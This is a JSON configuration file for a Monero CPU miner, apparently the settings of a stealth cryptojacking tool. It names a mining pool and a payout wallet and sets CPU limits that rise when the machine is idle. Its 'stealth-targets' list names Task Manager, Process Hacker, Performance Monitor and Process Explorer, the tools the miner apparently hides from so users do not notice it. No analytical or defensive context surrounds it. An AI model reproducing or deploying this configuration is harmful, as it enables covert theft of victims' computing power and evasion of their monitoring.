{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "48rNVrSVTsN557kEFosUTddab1wsEueY67XS9GEmzoXYZyyiykRwRKC6xBq3EipKg2jVVZyeqJrRJEx6oFBopPDR1sobZbw",
    "password": "x",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 40,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}